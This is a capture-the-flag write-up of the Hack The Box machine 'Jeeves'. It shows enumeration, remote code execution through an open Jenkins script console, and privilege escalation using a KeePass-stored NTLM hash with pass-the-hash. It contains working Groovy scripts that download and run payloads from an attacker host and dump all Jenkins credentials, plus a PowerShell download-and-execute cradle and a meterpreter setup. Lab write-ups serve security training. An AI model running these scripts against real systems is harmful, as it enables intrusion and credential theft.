Hack The Box last updated - 2019
Jeeves
Jeeves - 10.10.10.63
Target Enumeration:
OS: Windows
IP: 10.10.10.63
User Hash: e3232272596fb47950d59c4cf1e7066a
Root Hash: afbc5bd4b615a60648cec41c6ac92530
Ports / Services / Software Versions Running
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Vulnerability Exploited:
Jenkins /script enabled unauthenticated on port 50000
Privilege Escalation
The Administrator's NTLM hash is stored in a KeePass database protected by a weak master password.
Replicating the exploit:
Nmap TCP:
Nmap UDP:
Nikto:
Port 80
Port 50000
Dirb:
Port 80
Port 50000 brings back nothing.
Dirbuster:
Nothing found on port 50000 with the first runs; /askjeeves on port 50000 only turned up later.
Enum4linux brought back nothing.
Browsed to port 80: it is a search bar which, whatever you submit, always gives you the same response:
Source code:
Response from the initial web page.
Downloaded the image and ran it through strings and binwalk, which brought back nothing. The response is an image rather than a verbose error message, which suggests it is a troll. The main front-page image was checked the same way with strings.
Browsed to port 50000; the root returns a Jetty error page, which leaks the server version: Jetty 9.4.z-SNAPSHOT.
Tried the known Jetty issues against it:
https://www.exploit-db.com/exploits/36318/
dotdotpwn -m http -o windows -x 50000 -h 10.10.10.63
Also tried
https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
Not vulnerable: the shared-buffer leak (JetLeak) affects Jetty 9.2.x before 9.2.9, and this is a 9.4 build. Come back to this.
Finally found some dirs with Dirbuster: /askjeeves on port 50000, which turns out to be a Jenkins instance.
Dirbuster
Searchsploit brought back:
Metasploit brought back
None of them worked.
Found a way to execute commands via a Groovy script on the web server: the Jenkins script console (/askjeeves/script) is reachable without authentication, and anything run there executes inside the Jenkins JVM as whatever account the Jenkins service runs under.
Found rvshell.groovy
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
Download it from GitHub, change the host and port to your listener, paste it into the script console and execute with a listener on 443.
Use the following code to download files to the system
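As an added example (not the page's own screenshot and not frohoff's gist), the script below does the same job from the console: it runs a command, reports which account Jenkins is running as and where JENKINS_HOME is, pulls a file from the attacker's web server and launches it without blocking the console. It assumes the Windows host and the 10.10.14.8 attacker address used elsewhere on this page, and that C:\Users\Public is writable; the dropped path and the Shell.ps1 name are assumptions.

```groovy
// Added example for the unauthenticated Jenkins script console at
// http://10.10.10.63:50000/askjeeves/script (host and port from this page).
// Assumed: Windows target (per nmap), attacker web server at 10.10.14.8,
// C:\Users\Public writable. Not the page's or frohoff's code.
import jenkins.model.Jenkins

// Run a command through cmd.exe and return stdout+stderr as text.
// It executes inside the Jenkins JVM, i.e. as the Jenkins service account,
// so the only thing an attacker needs is reachability of /script.
def run(String cmd) {
    def proc = ["cmd.exe", "/c", cmd].execute()
    def out = new StringBuffer(), err = new StringBuffer()
    proc.waitForProcessOutput(out, err)
    return out.toString() + err.toString()
}

// Start a long-lived process (a reverse shell) and return immediately.
// consumeProcessOutput() drains its pipes so it cannot block on a full buffer;
// waiting on it instead would hang the console request until the shell dies.
def spawn(String cmd) {
    def proc = ["cmd.exe", "/c", cmd].execute()
    proc.consumeProcessOutput()
    return proc
}

// Fetch a file over HTTP into dest; returns the number of bytes written.
def fetch(String url, String dest) {
    def f = new File(dest)
    f.withOutputStream { os -> os << new URL(url).openStream() }
    return f.length()
}

// 1. Who is Jenkins running as, and where is JENKINS_HOME
//    (credentials.xml and secrets/ live under it).
println "user: " + run("whoami").trim()
println "home: " + Jenkins.instance.rootDir

// 2. Stage the payload served from the attacker box
//    (Shell.ps1 from unicorn, served with python -m SimpleHTTPServer 80).
def dropped = "C:\\Users\\Public\\Shell.ps1"     // assumed drop location
println "bytes: " + fetch("http://10.10.14.8/Shell.ps1", dropped)

// 3. Launch it; -File avoids quoting the whole script on the command line.
spawn("powershell -nop -exec bypass -File " + dropped)
println "payload started"
```

Start the handler before running step 3; the console returns as soon as the process is spawned, so a failed callback shows up only on the listener side.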
Convert to a meterpreter shell. LHOST is the attacker's VPN address (10.10.14.8 on this page); if the listener for the Groovy reverse shell is still on 443, close it first or the handler cannot bind the port.
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.8 443
python -m SimpleHTTPServer 80
In a new tab:
mv powershell_attack.txt Shell.ps1
msfconsole -r unicorn.rc
On the victim machine, from a command prompt:
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Shell.ps1')"
Run the local exploit suggester against the host.
Drop into a shell and download tools.
PowerUp.ps1
Service found
No exploits worked so far, so start digging around the system.
We found the following credentials in credentials.xml in the Jenkins directory.
The passwords are stored encrypted (the {...} values are AES-encrypted with a key derived from secrets/master.key), but Jenkins can decrypt its own secrets: run the decryption from the /script console on the web server and you get the password admin:
Search for other passwords.
This one, once decrypted, gives admin:admin, which is of no use for privesc.
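As an added example (not the page's screenshot), this is the console script that does the decryption, plus the shortcut of asking the credentials store directly instead of copying values out of credentials.xml. The {AQAA...} string is a constructed placeholder to be replaced with the real <password> value from the file; the rest uses Jenkins' own hudson.util.Secret and the Credentials plugin API.

```groovy
// Added example for the Jenkins script console; not the page's own code.
// Jenkins encrypts credentials.xml values with a key derived from
// $JENKINS_HOME/secrets/master.key and hudson.util.Secret reverses that
// from inside the JVM, so no offline key extraction is needed.
import hudson.util.Secret
import jenkins.model.Jenkins
import com.cloudbees.plugins.credentials.CredentialsProvider
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials

// 1. Decrypt one value copied out of credentials.xml.
//    Constructed placeholder: paste the real <password>{...}</password> contents.
def pasted = "{AQAAABAAAAAQ...}"
def s = Secret.decrypt(pasted)      // returns null if the value is not Jenkins-encrypted
println s == null ? "not a Jenkins-encrypted value" : "plaintext: " + s.plainText

// 2. Or skip the file and ask the credentials store for every
//    username/password credential visible at the root item group.
def creds = CredentialsProvider.lookupCredentials(
    StandardUsernamePasswordCredentials.class, Jenkins.instance, null, null)
creds.each { c ->
    println "${c.id}  ${c.username} : ${c.password.plainText}"
}
```

Step 2 is the one to run first on any Jenkins with an open script console: it lists everything the instance can authenticate with (and on this box shows that the only stored credential is admin:admin).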
Digging around the file system we find a KeePass database called CEH.
Download the file locally. The database's master password is weak, so recover it offline with a wordlist and then open the database.
Install kpcli:
apt-get install kpcli libterm-readline-gnu-perl libdata-password-perl
Inspect all of the entries.
One entry's password is not a password at all but a hex string in NTLM hash format.
Use pass-the-hash to log in to the system: the hash does not need cracking, it authenticates over SMB as-is.
Upload a Windows shell via our low-priv account and execute it via pth-winexe, supplying the hash in place of a password.
Interact with the meterpreter shell.
Grab your flags:
The root flag is not in the visible file content; it is hidden in an NTFS alternate data stream. List the file's streams and read the hidden one to get the root flag: